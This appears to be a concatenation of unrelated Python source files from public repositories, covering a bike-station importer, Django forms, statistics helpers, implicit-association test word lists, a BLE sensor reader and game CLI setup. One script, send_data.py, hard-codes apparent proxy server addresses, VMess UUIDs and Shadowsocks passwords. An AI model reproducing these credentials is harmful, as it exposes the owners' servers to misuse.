6e6c3307591bcf16eccdf142b301e1d682d3f6ad | 1,237 | py | Python | import.py | Findus23/citybike | 4c8527934df94df6d1db8fa8630590ce4946f5a8 | [
"MIT"
] | null | null | null | import.py | Findus23/citybike | 4c8527934df94df6d1db8fa8630590ce4946f5a8 | [
"MIT"
] | 5 | 2016-10-27T16:51:20.000Z | 2017-01-08T21:49:29.000Z | import.py | Findus23/citybike | 4c8527934df94df6d1db8fa8630590ce4946f5a8 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import json
import sys
from pprint import pprint
import requests
from config import database
import MySQLdb
try:
db = MySQLdb.connect(database["host"],
database["user"],
database["passwd"],
database["db"])
cur = db.cursor()
payload = {
"data": (
'[out:json][timeout:25];'
'area(3600109166)->.searchArea;'
'node["amenity"="bicycle_rental"]["network"="Citybike Wien"](area.searchArea);'
'out body;>;out skel qt;'
)
}
print("Overpass Abfrage")
r = requests.get('https://overpass-api.de/api/interpreter', params=payload)
data = r.json()
print("erfolgreich")
i = 0
for station in data["elements"]:
if station["type"] == "node":
tags = station["tags"]
cur.execute("REPLACE INTO stationen (ref, lon, lat, name) VALUES (%s,%s,%s,%s)",
(tags["ref"], station["lon"], station["lat"], tags["name"]))
i += 1
db.commit()
print("%s Stationen importiert" % i)
db.close()
except MySQLdb.Error as e:
print("Error %d: %s" % (e.args[0], e.args[1]))
sys.exit(1)
| 25.244898 | 92 | 0.527082 | 141 | 1,237 | 4.617021 | 0.560284 | 0.009217 | 0.009217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02093 | 0.30477 | 1,237 | 48 | 93 | 25.770833 | 0.736047 | 0.013743 | 0 | 0 | 0 | 0.027027 | 0.305168 | 0.105824 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.081081 | 0.189189 | 0 | 0.189189 | 0.135135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6e71fc8679bdfe831d2f3bf5cb5827fa16257f9c | 929 | py | Python | bke/bke_client/forms.py | Ntermast/BKE | 5a9b71c7c81102a2a3759bfa720d15e27ec96726 | [
"MIT"
] | null | null | null | bke/bke_client/forms.py | Ntermast/BKE | 5a9b71c7c81102a2a3759bfa720d15e27ec96726 | [
"MIT"
] | null | null | null | bke/bke_client/forms.py | Ntermast/BKE | 5a9b71c7c81102a2a3759bfa720d15e27ec96726 | [
"MIT"
] | null | null | null | from django import forms
from django.core.validators import FileExtensionValidator
from .models import Channel, Podcast
class ChannelForm(forms.ModelForm):
image = forms.ImageField(required=True)
class Meta:
model = Channel
fields = ('image',)
class PodcastForm(forms.ModelForm):
image = forms.ImageField(required=True)
file = forms.FileField(required=True, validators=[FileExtensionValidator(
allowed_extensions=['mp3'])])
class Meta:
model = Podcast
fields = ('image', 'file')
class PodcastImageForm(forms.ModelForm):
image = forms.ImageField(required=True)
class Meta:
model = Podcast
fields = ('image',)
class PodcastFileForm(forms.ModelForm):
file = forms.FileField(required=True, validators=[FileExtensionValidator(
allowed_extensions=['mp3'])])
class Meta:
model = Podcast
fields = ('file',)
| 23.820513 | 78 | 0.672766 | 91 | 929 | 6.846154 | 0.307692 | 0.096308 | 0.089888 | 0.11557 | 0.653291 | 0.653291 | 0.616372 | 0.542536 | 0.542536 | 0.542536 | 0 | 0.002755 | 0.218515 | 929 | 38 | 79 | 24.447368 | 0.855372 | 0 | 0 | 0.615385 | 0 | 0 | 0.031216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e7c323d646d86a4544c08eedbbd2426649d62c6 | 3,217 | py | Python | code/aip/misc/misc.py | andymiller/ReducedVarianceReparamGradients | 220b2ee4e9ef25e0d4d07632dc98582178c48160 | [
"MIT"
] | 36 | 2017-05-22T20:02:47.000Z | 2021-06-17T02:26:46.000Z | code/vbproj/misc/misc.py | andymiller/vboost | 4173756f4b506853442635116042c6907a318d86 | [
"MIT"
] | null | null | null | code/vbproj/misc/misc.py | andymiller/vboost | 4173756f4b506853442635116042c6907a318d86 | [
"MIT"
] | 5 | 2017-07-30T10:16:55.000Z | 2020-12-23T10:37:08.000Z | import autograd.numpy as np
from autograd.scipy.special import gammaln
def sigmoid(a):
return 1. / (1. + np.exp(-a))
def logit(a):
return np.log(a) - np.log(1-a)
def mvn_diag_logpdf(x, mean, log_std):
D = len(mean)
qterm = -.5 * np.sum((x - mean)**2 / np.exp(2.*log_std), axis=1)
coef = -.5*D * np.log(2.*np.pi) - np.sum(log_std)
return qterm + coef
def mvn_diag_logpdf_grad(x, mean, log_std):
pass
def mvn_diag_entropy(log_std):
D = len(log_std)
return .5 * (D*np.log(2*np.pi*np.e) + np.sum(2*log_std))
def mvn_logpdf(x, mean, icholSigma):
D = len(mean)
coef = -.5*D*np.log(2.*np.pi)
dterm = np.sum(np.log(np.diag(icholSigma)))
white = np.dot(np.atleast_2d(x) - mean, icholSigma.T)
qterm = -.5*np.sum(white**2, axis=1)
ll = coef + dterm + qterm
if len(ll) == 1:
return ll[0]
return ll
def mvn_fisher_info(params):
""" returns the fisher information matrix (diagonal) for a multivariate
normal distribution with params = [mu, ln sigma] """
D = len(params) / 2
mean, log_std = params[:D], params[D:]
return np.concatenate([np.exp(-2.*log_std),
2*np.ones(D)])
def kl_mvn(m0, S0, m1, S1):
"""KL divergence between two normal distributions - can
m0: N x
"""
# .5 log det (Sig1 Sig0^-1)
# + .5 tr( Sig1^-1 * ((mu_0 - mu_1)(mu_0 - mu_1)^T + Sig0 - Sig1) )
det_term = .5 * np.log(npla.det(npla.solve(S0, S1).T))
S1inv = npla.inv(S1)
diff = m0 - m1
outers = np.einsum("id,ie->ide", diff, diff) + S0 - S1
tr_term = .5 * np.einsum("de,ide->i", S1inv, outers)
return det_term + tr_term
def kl_mvn_diag(m0, S0, m1, S1):
"""
Kullback-Liebler divergence from Gaussian pm,pv to Gaussian qm,qv.
Also computes KL divergence from a single Gaussian pm,pv to a set
of Gaussians qm,qv.
Diagonal covariances are assumed. Divergence is expressed in nats.
- accepts stacks of means, but only one S0 and S1
From wikipedia
KL( (m0, S0) || (m1, S1))
= .5 * ( tr(S1^{-1} S0) + log |S1|/|S0| +
(m1 - m0)^T S1^{-1} (m1 - m0) - N )
"""
# store inv diag covariance of S1 and diff between means
N = m0.shape[1]
iS1 = 1./S1
diff = m1 - m0
# kl is made of three terms
tr_term = np.sum(iS1 * S0)
det_term = np.sum(np.log(S1)) - np.sum(np.log(S0))
quad_term = np.sum( (diff*diff) * iS1, axis=1)
return .5 * (tr_term + det_term + quad_term - N)
def gamma_lnpdf(x, shape, rate):
""" shape/rate formulation on wikipedia """
coef = shape * np.log(rate) - gammaln(shape)
dterm = (shape-1.) * np.log(x) - rate*x
return coef + dterm
def make_fixed_cov_mvn_logpdf(Sigma):
icholSigma = np.linalg.inv(np.linalg.cholesky(Sigma))
return lambda x, mean: mvn_logpdf(x, mean, icholSigma)
def unpack_params(params):
mean, log_std = np.split(params, 2)
return mean, log_std
def unconstrained_to_simplex(rhos):
rhosf = np.concatenate([rhos, [0.]])
pis = np.exp(rhosf) / np.sum(np.exp(rhosf))
return pis
def simplex_to_unconstrained(pis):
lnpis = np.log(pis)
return (lnpis - lnpis[-1])[:-1]
| 27.732759 | 75 | 0.596208 | 531 | 3,217 | 3.517891 | 0.278719 | 0.03212 | 0.026767 | 0.011242 | 0.071199 | 0.025696 | 0.025696 | 0.025696 | 0 | 0 | 0 | 0.038875 | 0.248368 | 3,217 | 115 | 76 | 27.973913 | 0.733664 | 0.250544 | 0 | 0.031746 | 0 | 0 | 0.008172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.015873 | 0.031746 | 0.031746 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e846b2e612b3a93fb38f65ca3d72ef859516fa8 | 4,913 | py | Python | lists/Greenwald_1998_Perez_2010_lists.py | realliyifei/ConceptorDebias | f622de88661790da64697d6440bcc92ebc6f3413 | [
"Apache-2.0"
] | 10 | 2019-02-04T19:31:02.000Z | 2021-12-22T16:06:50.000Z | lists/Greenwald_1998_Perez_2010_lists.py | realliyifei/ConceptorDebias | f622de88661790da64697d6440bcc92ebc6f3413 | [
"Apache-2.0"
] | null | null | null | lists/Greenwald_1998_Perez_2010_lists.py | realliyifei/ConceptorDebias | f622de88661790da64697d6440bcc92ebc6f3413 | [
"Apache-2.0"
] | 8 | 2020-04-11T14:12:26.000Z | 2022-03-28T02:56:09.000Z | # Greewald et al. 1998
Japanese_names = ["Hitaka", "Yokomichi", "Fukamachi", "Yamamoto", "Itsumatsu", "Yagimoto", "Kawabashi", "Tsukimoto", "Kushibashi", "Tanaka", "Kuzumaki", "Takasawa", "Fujimoto", "Sugimoto", "Fukuyama", "Samukawa", "Harashima", "Sakata", "Kamakura", "Namikawa", "Kitayama", "Nakamoto", "Minakami", "Morimoto", "Miyamatsu"]
Korean_names = ["Hwang", "Hyun", "Choung", "Maeng", "Chun", "Choe", "Kwon", "Sunwoo", "Whang", "Byun", "Sohn", "Kung", "Youn", "Chae", "Choi", "Chon", "Kwan", "Jung", "Kang", "Hwangbo", "Bhak", "Paik", "Chong", "Jang", "Yoon"]
Truncated_Japanese_names = ["Hitak", "Yoko", "Fukama", "Yamam", "Itsu", "Yagi", "Kawa", "Tsukim", "Kushi", "Tana", "Kuzu", "Taka", "Fuji", "Sugi", "Fuku", "Samu", "Hara", "Saka", "Kama", "Namikaw", "Kita", "Naka", "Minak", "Mori", "Miya"]
White_American_male_names = ["Adam", "Chip", "Harry", "Josh", "Roger", "Alan", "Frank", "Ian", "Justin", "Ryan", "Andrew", "Fred", "Jack", "Matthew", "Stephen", "Brad", "Greg", "Jed", "Paul", "Todd", "Brandon", "Hank", "Jonathan", "Peter", "Wilbur"]
Black_American_male_names = ["Alonzo", "Jamel", "Lerone", "Percell", "Theo", "Alphonse", "Jerome", "Leroy", "Rasaan", "Torrance", "Darnell", "Lamar", "Lionel", "Rashaun", "Tyree", "Deion", "Lamont", "Malik", "Terrence", "Tyrone", "Everol", "Lavon", "Marcellus", "Terryl", "Wardell"]
White_American_female_names = ["Amanda", "Courtney", "Heather", "Melanie", "Sara", "Amber", "Crystal", "Katie", "Meredith", "Shannon", "Betsy", "Donna", "Kristin", "Nancy", "Stephanie", "Bobbie-Sue", "Ellen", "Lauren", "Peggy", "Sue-Ellen", "Colleen", "Emily", "Megan", "Rachel", "Wendy"]
Black_American_female_names = ["Aiesha", "Lashelle", "Nichelle", "Shereen", "Temeka", "Ebony", "Latisha", "Shaniqua", "Tameisha", "Teretha", "Jasmine", "Latonya", "Shanise", "Tanisha", "Tia", "Lakisha", "Latoya", "Sharise", "Tashika", "Yolanda", "Lashandra", "Malika", "Shavonn", "Tawanda", "Yvette"]
Positive_words = ["caress", "freedom", "health", "love", "peace", "cheer", "friend", "heaven", "loyal", "pleasure", "diamond", "gentle", "honest", "lucky", "rainbow", "diploma", "gift", "honor", "miracle", "sunrise", "family", "happy", "laughter", "paradise", "vacation"]
Negative_words = ["abuse", "crash", "filth", "murder", "sickness", "accident", "death", "grief", "poison", "stink", "assault", "disaster", "hatred", "pollute", "tragedy", "bomb", "divorce", "jail", "poverty", "ugly", "cancer", "evil", "kill", "rotten", "vomit", "agony", "prison"]
# NOTE: according to Greenwald et al. 1998 () divorce and kill were only in experiment 1 while prison was only in experiments 2 and 3
Negative_words_1 = ["abuse", "crash", "filth", "murder", "sickness", "accident", "death", "grief", "poison", "stink", "assault", "disaster", "hatred", "pollute", "tragedy", "bomb", "divorce", "jail", "poverty", "ugly", "cancer", "evil", "kill", "rotten", "vomit", "agony"]
Negative_words_2_3 = ["abuse", "crash", "filth", "murder", "sickness", "accident", "death", "grief", "poison", "stink", "assault", "disaster", "hatred", "pollute", "tragedy", "bomb", "jail", "poverty", "ugly", "cancer", "evil", "rotten", "vomit", "agony", "prison"]
Flowers = ["aster", "clover", "hyacinth", "marigold", "poppy", "azalea", "crocus", "iris", "orchid", "rose", "bluebell", "daffodil", "lilac", "pansy", "tulip", "buttercup", "daisy", "lily", "peony", "violet", "carnation", "gladiola", "magnolia", "petunia", "zinnia"]
Insects = ["ant", "caterpillar", "flea", "locust", "spider", "bedbug", "centipede", "fly", "maggot", "tarantula", "bee", "cockroach", "gnat", "mosquito", "termite", "beetle", "cricket", "hornet", "moth", "wasp", "blackfly", "dragonfly", "horsefly", "roach", "weevil"]
Instruments = ["bagpipe", "cello", "guitar", "lute", "trombone", "banjo", "clarinet", "harmonica", "mandolin", "trumpet", "bassoon", "drum", "harp", "oboe", "tuba", "bell", "fiddle", "harpsichord", "piano", "viola", "bongo", "flute", "horn", "saxophone", "violin"]
Weapons = ["arrow", "club", "gun", "missile", "spear", "axe", "dagger", "harpoon", "pistol", "sword", "blade", "dynamite", "hatchet", "rifle", "tank", "bomb", "firearm", "knife", "shotgun", "teargas", "cannon", "grenade", "mace", "slingshot", "whip"]
# Perez 2010
Latino_immigrant_surnames = ["García", "Martínez", "Rodríguez", "López", "Hernández", "González", "Pérez", "Sánchez", "Díaz", "Ramírez"]
White_immigrant_surnames = ["Smith", "Johnson", "Williams", "Jones", "Brown", "Davis", "Miller", "Wilson", "Moore", "Taylor"]
Asian_immigrant_surnames = ["Nguyen", "Liu", "Tran", "Chen", "Wong", "Wu", "Wang", "Choi", "Chang", "Yang"]
Good_words = ["Honest", "Joy", "Love", "Peace", "Wonderful", "Honor", "Pleasure", "Glorious", "Laughter", "Happy"]
Bad_words = ["Agony", "Prison", "Terrible", "Horrible", "Nasty", "Evil", "Awful", "Failure", "Hurt", "Poverty"]
good_words = [w.lower() for w in Good_words]
bad_words = [w.lower() for w in Bad_words]
| 163.766667 | 320 | 0.620191 | 529 | 4,913 | 5.693762 | 0.775047 | 0.012948 | 0.01494 | 0.020916 | 0.15073 | 0.14243 | 0.131142 | 0.131142 | 0.131142 | 0.131142 | 0 | 0.004097 | 0.105842 | 4,913 | 29 | 321 | 169.413793 | 0.681539 | 0.033177 | 0 | 0 | 0 | 0 | 0.530763 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e8a3821b3bae7c8d06c259c866a77fc11f08d4f | 2,006 | py | Python | app/test/send_data.py | gpp0725/EchoProxy | 0273f47397b76fa0292db267d99eeb9dccc4e869 | [
"Apache-2.0"
] | null | null | null | app/test/send_data.py | gpp0725/EchoProxy | 0273f47397b76fa0292db267d99eeb9dccc4e869 | [
"Apache-2.0"
] | null | null | null | app/test/send_data.py | gpp0725/EchoProxy | 0273f47397b76fa0292db267d99eeb9dccc4e869 | [
"Apache-2.0"
] | null | null | null | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/3 0003 1:02
# @Author : Gpp
# @File : send_data.py
import requests
data = {"local": "beijing"}
proxy_data = {'proxy_data': [
{"v": "2",
"ps": "BWG-LA",
"add": "65.49.212.111",
"port": "62860",
"proxy_id": "523f96fd-a480-4b13-919e-ddd54dee3d71",
"aid": "233",
"net": "tcp",
"type": "none",
"host": "",
"path": "",
"tls": "",
"proxy_type": "vmess",
"is_share": True,
},
{"v": "2",
"ps": "GCP-TW",
"add": "34.80.52.191",
"port": "45461",
"proxy_id": "ec6a267e-987d-44a8-aff5-fd646e9b6d87",
"aid": "233",
"net": "tcp",
"type": "none",
"host": "",
"path": "",
"tls": "",
"proxy_type": "vmess",
"is_share": True,
},
{
"add": "34.80.60.73",
"port": "35535",
"secret": "aes-256-cfb",
"password": "t14RB2u6D5dA",
"alias": "GWP-Taiwan",
"proxy_type": "ss",
"is_share": True,
},
{
"add": "65.49.212.111",
"port": "18344",
"secret": "aes-256-cfr",
"password": "6D#gpFucT$8a",
"alias": "BWG-LA",
"proxy_type": "ss",
"is_share": True,
}]}
proxy_data2 = {'proxy_data': [{"aid": "sds", "proxy_type": "vmess", "port": "2344475", "add": "34.56.767.397"},
{"add": '45345.6778', "proxy_type": "ss", "port": "237443"}]}
proxy_data3 = {"type": "vmess", "data": [{"port": "234445", "add": "34.56.767.39"}, {"type": "hht", "aid": "sds_"}]}
# a = requests.get('http://127.0.0.1:196/proxy', json=proxy_data)
# print(a.json())
j = requests.post('http://127.0.0.1:196/proxy', json=proxy_data)
# print(type(a.json()), a.json())
# k = requests.put('http://127.0.0.1:196/proxy', json=proxy_data3)
# print(k.status_code)
# d = requests.delete('http://127.0.0.1:196/proxy', json=proxy_data2)
# a = requests.get('http://127.0.0.1:196/generate')
# print(a.json())
| 27.108108 | 116 | 0.491525 | 261 | 2,006 | 3.685824 | 0.440613 | 0.056133 | 0.04158 | 0.046778 | 0.366944 | 0.366944 | 0.285863 | 0.285863 | 0.285863 | 0.191268 | 0 | 0.148711 | 0.245763 | 2,006 | 73 | 117 | 27.479452 | 0.487112 | 0.222333 | 0 | 0.45283 | 0 | 0 | 0.417853 | 0.046572 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.037736 | 0.018868 | 0 | 0.018868 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e9b8ea7e2bd07dc4d06872cc020b7b5cecd74b2 | 811 | py | Python | scripts/protocol/ibp/exceptions.py | periscope-ps/unis | b43b66f84fe91218d23c79dbf9e20fcec870ce74 | [
"BSD-3-Clause"
] | 2 | 2015-06-27T14:41:39.000Z | 2017-05-18T18:33:02.000Z | scripts/protocol/ibp/exceptions.py | periscope-ps/unis | b43b66f84fe91218d23c79dbf9e20fcec870ce74 | [
"BSD-3-Clause"
] | 18 | 2015-12-16T21:42:09.000Z | 2021-09-29T15:55:39.000Z | scripts/protocol/ibp/exceptions.py | periscope-ps/unis | b43b66f84fe91218d23c79dbf9e20fcec870ce74 | [
"BSD-3-Clause"
] | 2 | 2017-09-01T15:35:21.000Z | 2019-07-19T02:57:05.000Z | # =============================================================================
# periscope-ps (unis)
#
# Copyright (c) 2012-2016, Trustees of Indiana University,
# All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD
# license. See the COPYING file for details.
#
# This software was created at the Indiana University Center for Research in
# Extreme Scale Technologies (CREST).
# =============================================================================
from ..exceptions import AllocationException
class IBPException(AllocationException):
''' Generic exception for IBP related errors '''
def __init__(self, *args, **kwargs):
self.ibpResponse = kwargs.pop("response", None)
super(IBPException, self).__init__(*args, **kwargs)
| 38.619048 | 79 | 0.583231 | 80 | 811 | 5.8125 | 0.775 | 0.073118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011594 | 0.149199 | 811 | 20 | 80 | 40.55 | 0.662319 | 0.654747 | 0 | 0 | 0 | 0 | 0.030534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e9c3754b5c7a769bcc1a2383a850d736f933e82 | 6,016 | py | Python | BLE_Notifications.py | JyriLehtinen/Bluetooth | 84a80bbad0a1b2c11185e45e04a8f75a59b86644 | [
"MIT"
] | null | null | null | BLE_Notifications.py | JyriLehtinen/Bluetooth | 84a80bbad0a1b2c11185e45e04a8f75a59b86644 | [
"MIT"
] | null | null | null | BLE_Notifications.py | JyriLehtinen/Bluetooth | 84a80bbad0a1b2c11185e45e04a8f75a59b86644 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#This code scans for BLE advertising and decodes sensor data from a certain type of sensor module prototype
import sys
from bluepy.btle import Scanner, DefaultDelegate, Peripheral, BTLEException, Service, Characteristic
import os
import time
class SensorDelegate(DefaultDelegate):
message = 0
def __init__(self):
DefaultDelegate.__init__(self)
def handleNotification(self, cHandle, data):
self.message = data
def readNotification(self):
return self.message
class SensorModule:
def __init__(self, name, MAC, sensors):
self.name = name
self.MAC = MAC
#Describes what sensors are mounted on the unit using a 4B bitfield
self.sensors = sensors
def StartScan(duration):
scanner = Scanner().withDelegate(SensorDelegate())
devices = scanner.scan(duration)
for dev in devices:
if(dev.getValueText(0xFF)):
if("4e4f4b" in dev.getValueText(0xFF)):
#This means "NOK" was found in the advertising packet
sensor_array = bytearray.fromhex(dev.getValueText(0xFF))
#Populate the sensor bitfield according to the advertising packet
sensors_mounted = int(sensor_array[7])
sensors_mounted += int(sensor_array[8] << 8)
sensors_mounted += int(sensor_array[9] << 16)
sensors_mounted += int(sensor_array[10] << 24)
target = SensorModule(dev.getValueText(0x09), dev.addr, sensors_mounted)
print "Battery module found, name = %s MAC: %s, sensors %d" % (target.name, target.MAC, target.sensors)
return target
#Changes the number of samples collected before transmitting them (default: 60) by writing 'B' followed by uint16_t in Little Endian
#Write is done to the configuration characteristic (Handle 0x15)
def SetTxLen(peripheral, tx_len):
command = bytearray([0x42, 0x00, 0x00])
command[1] = tx_len & 0x00FF
command[2] = (tx_len & 0xFF00) >> 8
peripheral.writeCharacteristic(0x15, command)
#This function changes the time between two samples (default: 1) by writing 'I' followed by uint16_t in Little Endian
def SetSampleInterval(peripheral, interval):
command = bytearray([0x49, 00, 00])
command[1] = interval & 0x00FF
command[2] = (interval & 0xFF00) >> 8
peripheral.writeCharacteristic(0x15, command)
#This function populates the instance with GATT services and characteristics
def discoverCharacteristics(peripheral):
for service in peripheral.getServices():
print service
service.getCharacteristics()
#Enable notifications in the data_stream characteristics by writing 0x01 to the descriptor (Handle 0x0F)
def enableNotification(peripheral):
peripheral.writeCharacteristic(0x0F, '\x01')
#Disable the data_stream notifications
def disableNotification(peripheral):
peripheral.writeCharacteristic(0x0F, '\x00')
#Receive and save the data streamed by the sensor module
def loopNotifications(peripheral, name, sensors):
myString = ""
time = os.popen("date")
for c in time.readlines():
myString += c
myString = myString.rstrip()
myFile.write(myString + '\n')
myFile.write("Module name: %s\n" % (name)) #Write the current date and time, along with the module name we're connected to
i = 0
while (peripheral.waitForNotifications(0.5)): #Keep looping until the wait times out (transmission over)
notification = peripheral.delegate.readNotification()
print notification.encode("hex")
myFile.write(decodeData(notification.encode("hex"), sensors) + '\n')
i += 1
myFile.flush()
#Decode the data streamed over BLE accordingly. How to interpret the data depends on the sensors mounted
def decodeData(hexline, sensors_mounted):
returnString = ""
hex_array = bytearray.fromhex(hexline)
seconds = int(hex_array[0] + (hex_array[1] << 8) + (hex_array[2] << 16) + (hex_array[3] << 24))
returnString = "Time: %d\t" % (seconds)
if(sensors_mounted & 0x01):
temperature = float(hex_array[4] + (hex_array[5] << 8))
returnString += "Temperature: %.1f\t" % (temperature/10.0)
if(sensors_mounted & 0x02):
humidity = float(hex_array[6] + (hex_array[7] << 8))
returnString += "Humidity: %.1f%%\t" % (humidity/10.0)
if(sensors_mounted & 0x0100):
voltage = int(hex_array[4] + (hex_array[5] << 8))
returnString += "Voltage: %d\t" % (voltage)
if(sensors_mounted & 0x0400):
temperature = float((hex_array[6] & 0x7F))
if(hex_array[7] & 0x80):
temperature += 0.5
returnString += "Temp: %.1f" % (temperature)
#print "Time: %d\tVoltage: %d\tTemp: %.1f" % (seconds, voltage, temperature)
return returnString
def adjustConfigurations(slave, sensors):
if(sensors & 0x03):
SetTxLen(slave, 30)
SetSampleInterval(slave, 10)
elif(sensors & 0x0500):
SetTxLen(slave, 240)
SetSampleInterval(slave, 1)
def main():
global myFile
myFile = open("SensorData_Streamed.txt", "a" )
while(1):
print "Scanning for Sensor Modules."
target = StartScan(3)
while (target is None):
sys.stdout.write('.')
sys.stdout.flush()
target = StartScan(3)
print "Target found, proceeding to connect!"
try:
#slave = Peripheral(target.MAC, "random")
slave = Peripheral(target.MAC, "public")
slave.setDelegate(SensorDelegate())
except BTLEException, e:
print "Connection failed!"
print e.code
print e.message
time.sleep(3)
continue
discoverCharacteristics(slave)
enableNotification(slave)
loopNotifications(slave, target.name, target.sensors)
adjustConfigurations(slave, target.sensors)
slave.disconnect()
print "Disconnected"
main()
| 35.809524 | 132 | 0.654255 | 692 | 6,016 | 5.618497 | 0.351156 | 0.026749 | 0.01749 | 0.023663 | 0.100823 | 0.062243 | 0.062243 | 0.046296 | 0 | 0 | 0 | 0.03523 | 0.240359 | 6,016 | 167 | 133 | 36.023952 | 0.815536 | 0.205785 | 0 | 0.033898 | 0 | 0 | 0.061122 | 0.004831 | 0 | 0 | 0.023104 | 0 | 0 | 0 | null | null | 0 | 0.033898 | null | null | 0.076271 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ea31eea2339507561fd448651449932198e0fd2 | 6,153 | py | Python | dev/Gems/CloudGemPlayerAccount/AWS/resource-manager-code/command.py | brianherrera/lumberyard | f85344403c1c2e77ec8c75deb2c116e97b713217 | [
"AML"
] | 1,738 | 2017-09-21T10:59:12.000Z | 2022-03-31T21:05:46.000Z | dev/Gems/CloudGemPlayerAccount/AWS/resource-manager-code/command.py | ArchitectureStudios/lumberyard | f85344403c1c2e77ec8c75deb2c116e97b713217 | [
"AML"
] | 427 | 2017-09-29T22:54:36.000Z | 2022-02-15T19:26:50.000Z | dev/Gems/CloudGemPlayerAccount/AWS/resource-manager-code/command.py | ArchitectureStudios/lumberyard | f85344403c1c2e77ec8c75deb2c116e97b713217 | [
"AML"
] | 671 | 2017-09-21T08:04:01.000Z | 2022-03-29T14:30:07.000Z | #
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# $Revision: #1 $
import resource_manager.cli
import pa_service_api
def add_cli_commands(hook, subparsers, add_common_args, **kwargs):
subparser = subparsers.add_parser("player-account", help="Commands to manage the CloudGemPlayerAccount gem")
subparser.register('action', 'parsers', resource_manager.cli.AliasedSubParsersAction)
player_account_subparsers = subparser.add_subparsers(dest='subparser_name', metavar='COMMAND')
subparser = player_account_subparsers.add_parser('add-player', help='Add a new player')
subparser.add_argument('--username', type=str, required=True, help='The cognito username of the account to create')
subparser.add_argument('--email', type=str, required=True, help='The email address for the player')
subparser.add_argument('--playername', type=str, required=False, help='The name of the player in the game.')
subparser.add_argument('--givenname', type=str, required=False, help='The players given name,')
subparser.add_argument('--familyname', type=str, required=False, help='The players family name,')
subparser.add_argument('--nickname', type=str, required=False, help='The players nickname')
subparser.add_argument('--gender', type=str, required=False, choices=pa_service_api.GENDER_CHOICES, help='The players gender')
subparser.add_argument('--locale', type=str, required=False, help='The players locale')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_add_player)
subparser = player_account_subparsers.add_parser('ban-player', help='Ban a player. See remove_player_ban to restore player')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to ban')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_ban_player)
subparser = player_account_subparsers.add_parser('confirm-player', help='Force confirm a player')
subparser.add_argument('--username', type=str, required=True, help='The cognito username of the account to confirm')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_confirm_player)
subparser = player_account_subparsers.add_parser('edit-player', help='Edit a players settings')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to edit')
subparser.add_argument('--playername', type=str, required=False, help='The name of the player in the game.')
subparser.add_argument('--givenname', type=str, required=False, help='The players given name,')
subparser.add_argument('--familyname', type=str, required=False, help='The players family name,')
subparser.add_argument('--nickname', type=str, required=False, help='The players nickname,')
subparser.add_argument('--gender', type=str, required=False, choices=pa_service_api.GENDER_CHOICES, help='The players gender')
subparser.add_argument('--locale', type=str, required=False, help='The players locale')
subparser.add_argument('--email', type=str, required=False, help='The email address for the player')
add_common_args(subparser)
